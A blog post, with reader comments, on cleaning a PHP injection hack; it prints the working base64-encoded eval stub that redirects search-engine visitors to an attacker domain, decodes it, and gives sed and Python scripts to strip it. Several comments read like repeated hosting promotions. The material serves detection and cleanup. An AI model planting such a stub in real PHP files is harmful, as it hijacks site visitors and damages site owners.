Even though I have changed my servers, I have been hacked several times. I could not find out how it gets into my server and inserts its PHP code into every PHP file on the server. I checked my file permissions and everything else; nothing seemed to be vulnerable. A non-techie would not notice the attack, since it does not affect the normal loading of the website. But when you visit the website as the Google bot it redirects to gigop.americanunfinished.com. If Google Webmaster Tools is enabled for your website, you receive a notification from Google that your website has been removed from the index once it is hacked. Also, if you find the following PHP code in any of the PHP files on your server, you can confirm the attack.
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>
When you decode the above PHP code you get the following. It silences errors with error_reporting(0), looks at the HTTP_REFERER, and redirects any visitor who arrived from one of the listed search engines or social sites to the attacker's domain, which is why regular visitors typing the URL directly never see anything wrong:
<?php
error_reporting(0);                     // hide any PHP errors the stub might cause
$qazplm=headers_sent();
if (!$qazplm){                          // only redirect while headers can still be changed
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){
            // fire only for visitors who arrived from a search engine or social site
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://gigop.americanunfinished.com/");
                    exit();
                }
            }
        }
    }
}
?>
Since I did not have a backup of all my files, I sought help from a friend who works as a sysadmin. He wrote the following shell script to clean the code from all files.
You can follow the steps below to remove the injected code.
Step 1: Copy the code below and save it as “clean.sh”
#!/bin/sh
# Usage: ./clean.sh file.php
# Keeps the original as file.php.hack and writes a cleaned copy back to file.php
src="$1.hack"
dst="$1"
mv "$dst" "$src"
# Delete the exact injected statement; ',' is used as the sed delimiter because the base64 text contains '/'
sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));,,g' "$src" > "$dst"
Step 2: Upload “clean.sh” to the root folder and give it the permissions it needs (the script must be executable to run as ./clean.sh)
Step 3: Run the following command
find . -name '*.php' -exec ./clean.sh \{\} \;
This removes the code from all PHP files and keeps each original with a .php.hack extension.
For example, after running the above command index.php will be clean and index.php.hack will be the original (infected) file.
Or you can run the script on a single file first to make sure it is working properly:
./clean.sh index.php
Step 4: If everything is fine, run the following command to remove all the .php.hack files.
find . -name '*.hack' -exec rm -f \{\} \;
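As an added example (this is not the author's clean.sh nor any project's code), here is a Python scanner that covers both the detection described at the top of the post and the clean-up steps above. Unlike the sed one-liner, it matches any eval(base64_decode("...")) stub rather than one hard-coded string, decodes each payload so you can read what it does and which URL it redirects to, keeps a .hack backup, and rewrites each file in place so the file's owner and permissions survive (mv followed by a shell redirect leaves the cleaned file owned by whoever ran the script). Every function name, the constructed sample payload and the placeholder domain redirect.invalid are assumptions of this example, not taken from the page.

```python
"""Added example for this post (not the author's clean.sh): find eval(base64_decode("...")) stubs
in PHP files, decode them so you can see what they do, and strip them in place."""
import base64
import re
import shutil
import tempfile
from pathlib import Path

# The stub as it appears on this page: either a whole <?php ... ?> tag holding only the eval,
# or a bare eval(...) statement dropped into an existing PHP block.  The base64 body is captured.
_B64 = r'([A-Za-z0-9+/=\s]+)'
WRAPPED_RE = re.compile(r'<\?php\s*eval\(base64_decode\("' + _B64 + r'"\)\);\s*\?>\s*')
BARE_RE = re.compile(r'eval\(base64_decode\("' + _B64 + r'"\)\);\s*')


def decode_payload(b64: str) -> str:
    """Decode one base64 argument (missing padding tolerated); bad data is reported, not raised."""
    b64 = re.sub(r'\s+', '', b64)
    b64 += '=' * (-len(b64) % 4)
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return '<undecodable>'
    return raw.decode('utf-8', errors='replace')


def strip_injections(text: str):
    """Remove every stub from a PHP source string; return (cleaned_text, [decoded payloads])."""
    payloads = []

    def _take(match):
        payloads.append(decode_payload(match.group(1)))
        return ''

    cleaned = WRAPPED_RE.sub(_take, text)   # whole <?php eval(...); ?> tags first
    cleaned = BARE_RE.sub(_take, cleaned)   # then any eval(...) left inside other blocks
    return cleaned, payloads


def find_injections(text: str) -> list:
    """Report-only variant: the decoded payloads present in the text."""
    return strip_injections(text)[1]


def redirect_target(payload: str):
    """Pull the URL out of header("Location: ...") so you know where visitors were sent."""
    m = re.search(r'header\(\s*["\']Location:\s*([^"\']+)["\']', payload)
    return m.group(1).strip() if m else None


def clean_file(path: Path, keep_backup: bool = True) -> int:
    """Strip stubs from one file, rewriting it in place so mode and owner are preserved.
    Returns the number of stubs removed; a .hack copy of the original is kept by default."""
    text = path.read_bytes().decode('latin-1')          # lossless round trip for any bytes
    cleaned, payloads = strip_injections(text)
    if payloads:
        if keep_backup:
            shutil.copy2(path, path.with_name(path.name + '.hack'))
        path.write_bytes(cleaned.encode('latin-1'))
    return len(payloads)


def clean_tree(root: Path, keep_backup: bool = True) -> dict:
    """Clean every *.php under root; return {path: stubs removed} for the files that were hit."""
    hits = {}
    for php in sorted(root.rglob('*.php')):
        n = clean_file(php, keep_backup)
        if n:
            hits[php] = n
    return hits


def make_stub(payload: str, wrapped: bool = True) -> str:
    """Build a stub of the page's shape from a plaintext payload (used for the constructed sample)."""
    stub = 'eval(base64_decode("%s"));' % base64.b64encode(payload.encode()).decode()
    return '<?php %s ?>' % stub if wrapped else stub


# Constructed sample: a cut-down stand-in for the payload on this page.  The redirect goes to a
# reserved placeholder domain, not the real one.
SAMPLE_PAYLOAD = ('error_reporting(0); if (stristr($_SERVER["HTTP_REFERER"], "google")) '
                  '{ header("Location: http://redirect.invalid/"); exit(); }')
SAMPLE_CLEAN = "<?php\necho 'hello';\n"


def demo() -> dict:
    """Infect a copy of SAMPLE_CLEAN in a temp web root, clean the tree, and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / 'index.php').write_text(make_stub(SAMPLE_PAYLOAD) + SAMPLE_CLEAN)
        (root / 'wp-content').mkdir()
        (root / 'wp-content' / 'ok.php').write_text(SAMPLE_CLEAN)
        hits = clean_tree(root)
        return {
            'files_cleaned': [p.name for p in hits],
            'index_restored': (root / 'index.php').read_text() == SAMPLE_CLEAN,
            'backup_kept': (root / 'index.php.hack').exists(),
        }


if __name__ == '__main__':
    print(demo())
```

On a real web root, run find_injections on a few files first and read the decoded payloads (redirect_target tells you where visitors were being sent), then call clean_tree(Path('.')) once you are satisfied the only thing being removed is the stub. Two caveats: the regexes only cover the eval(base64_decode(...)) shape shown on this page, so a payload packed with gzinflate or str_rot13 would need another pattern; and, as several commenters below point out, stripping the stub does nothing about the entry point that let it in, so the backdoor file or outdated component still has to be found and removed.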
Jason, Apr 3, 2012 at 2:54 pm
Thanks so much for posting this. I had the same hack and used your help to fix it. Any idea how they got in?
admin (Author), Apr 3, 2012 at 4:36 pm
No idea, man!! I have made all my files write-protected after that; it might be some security issue in an old WordPress version.
Thomas, Apr 6, 2012 at 6:57 pm
When I run the code I get this message:
find: ./clean.sh: No such file or directory
admin (Author), Apr 6, 2012 at 7:00 pm
Did you upload the file?
Thomas, Apr 6, 2012 at 7:08 pm
Yes, I uploaded the file, then I did
chmod 777 clean.sh
Then I ran the command you provided in the Root of the server’s SSH.
admin (Author), Apr 6, 2012 at 7:11 pm
Are you running the commands from the same location where the file resides?? Double check the path.
admin (Author), Apr 6, 2012 at 7:14 pm
If you are trying only a specific file, you have to specify the file name you want to clean after ./clean.sh, e.g. ./clean.sh index.php
Thomas, Apr 6, 2012 at 7:18 pm
I can show you what I have
http://gyazo.com/b4abf2c781697f4e523d3c6b3536ec2d
admin (Author), Apr 6, 2012 at 7:26 pm
Could you create a sample PHP file and try this command alone: ./clean.sh index.php
admin (Author), Apr 6, 2012 at 7:27 pm
Or copy the file to public_html folder and try it from there
Cynthia, Apr 9, 2012 at 2:21 am
This has been happening to me as well. I just deleted WordPress and am reinstalling it. The databases are fine; it’s just the PHP files. I’ve been running the Bullet Proof Security plugin and changing the permissions of files as it advises (plus all the index.php files under the theme directories), and also running the Exploit Scanner plugin, which identifies all the eval code that’s in there.
I hope that the permission changes will secure my blogs enough so that they don’t get in again. No idea how they are getting in. It’s totally annoying!
Ira, Apr 19, 2012 at 6:51 pm
I would suggest that you sign up for an account with theshosting.com. They provide free malware removal services for anybody hosted on their servers. My site was hacked at Bluehost and they were able to transfer it from Bluehost and also remove the malware injection for free!
They were even able to tell me exactly where the hack originated from as well. They said it came from an outdated timthumb.php file, which they were able to update for me.
They also did a scan of my account and told me all the security vulnerabilities of my account.
I honestly suggest switching over to them if your website is hacked. They can transfer and remove the hack from your site. Best of all, they do this for free.
Cynthia, Apr 20, 2012 at 7:34 pm
Thanks Ira, I will look at them. Do you host there?
Ira, Apr 20, 2012 at 7:43 pm
Yup, I have all my wordpress sites with them now. Bluehost was awful. I literally got hacked like 3 times and they did nothing to help.
ryan64, Apr 24, 2012 at 7:52 pm
I guess I’m a bit of a newb on this, but can you walk me through how to do step 3, run the command? Where do I put the code?
admin (Author), Apr 24, 2012 at 11:19 pm
You need to put the file in the web root folder to check all infected files, and run the following command from that folder:
find . -name '*.php' -exec ./clean.sh \{\} \;
alex, Jul 3, 2012 at 6:26 am
Can somebody explain to me where to put the command lines?
Thanks
Scott, Jul 4, 2012 at 6:25 pm
Hey, as per Ira’s suggestion, I switched hosts as well to theshosting.com. I am not very technical, so this command stuff isn’t for me. I just wanted to come back with a review.
After I signed up with them, I requested a transfer from them. They were able to transfer all the content from my previous host. From there they were able to completely remove the malware on my site. Before this, my site was showing the Google attack page for 1 month and I was not able to find anybody that could help with this. Now it is completely fine and I didn’t need to do anything. Not only were they able to clean the entire site, they also told me exactly where the intrusion occurred. In my case, they said I had a PHP shell embedded in a file called 404.php that allowed the intruder to continue to gain access. They were able to remove this for me as well.
I contacted them again to find out if they offer this only to new clients or if this is a service they continually provide. It turns out that they assist with this any time it occurs on their servers. This is the guarantee they provided me: “If your account is ever compromised, many times we will notice this even before you will as we are always monitoring the logs for suspicious uploads. If at any time, you believe your account was compromised please contact us as soon as possible so that we may find out what exactly was modified and take steps to secure your account. We will assist with this at any time.”
They are an awesome host! I highly suggest that you switch over to them, especially if your site is infected with malware, as they will take care of all of that for you!!
admin (Author), Jul 4, 2012 at 9:07 pm
Thank you, Scott. My 404.php was not cleared; now it’s fine.
Severe Attacks on Wordpress websites - ertyuiop.itsaol, Jul 27, 2012 at 11:30 am
[...] can refer my previous post regarding the wordpress hacking here to resolve the issue and for more [...]
JTPratt Media, Aug 15, 2012 at 9:03 pm
So you removed the hacked code, but did you find the source of the break-in? If not it could happen again and again. That’s the most common complaint to a hacked WP website “it keeps happening”.
We wrote about what to do the other day on our blog:
jtprattmedia.com/my-wordpress-website-is-still-getting-hacked/
Nathaly, Sep 13, 2012 at 3:54 am
If you want to stop these attacks, after removing the hack code from all your files, you should change all your FTP account passwords. That works for me!
Nidhin, Oct 11, 2012 at 10:14 am
Thanks a lot, it saved my ass.
How to remove malware from Wordpress website? | SkillsYard, Oct 26, 2012 at 11:31 am
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]
Iosif, Dec 9, 2012 at 5:54 am
It is extremely important to find out how they got in. You can remove the code but eventually it will be back, if you don’t close the door.
How to remove malware from WordPress website? - MadGuyyy, Feb 3, 2013 at 12:51 pm
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]
How to remove malware from WordPress website? | ScrewDesk, Mar 31, 2013 at 8:28 pm
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]